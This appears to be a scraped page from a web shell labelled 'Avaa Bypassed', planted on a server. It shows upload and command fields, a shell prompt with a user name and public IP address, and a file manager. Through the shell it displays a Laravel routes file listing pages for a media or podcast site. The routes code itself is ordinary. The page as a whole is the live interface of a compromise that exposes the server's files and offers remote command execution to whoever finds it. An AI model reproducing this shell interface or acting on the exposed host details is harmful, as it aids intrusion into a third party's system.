404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.216.78.8: ~ $
<?php

use App\Http\Controllers\HomeController;
use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider and all of them will
| be assigned to the "web" middleware group. Make something great!
|
*/

Route::get('/', [HomeController::class, 'home'])->name('home');
Route::get('about-us', [HomeController::class, 'about'])->name('about');
Route::get('contact-us', [HomeController::class, 'contact'])->name('contact');
Route::get('our-shows', [HomeController::class, 'shows'])->name('shows');
Route::get('news', [HomeController::class, 'news'])->name('news');
Route::get('news-details', [HomeController::class, 'newsDetails'])->name('details');
Route::get('podcasts', [HomeController::class, 'podcasts'])->name('podcasts');
Route::get('gallery', [HomeController::class, 'gallery'])->name('gallery');

Filemanager

Name Type Size Permission Actions
api.php File 570 B 0644
channels.php File 558 B 0644
console.php File 592 B 0644
web.php File 1.04 KB 0644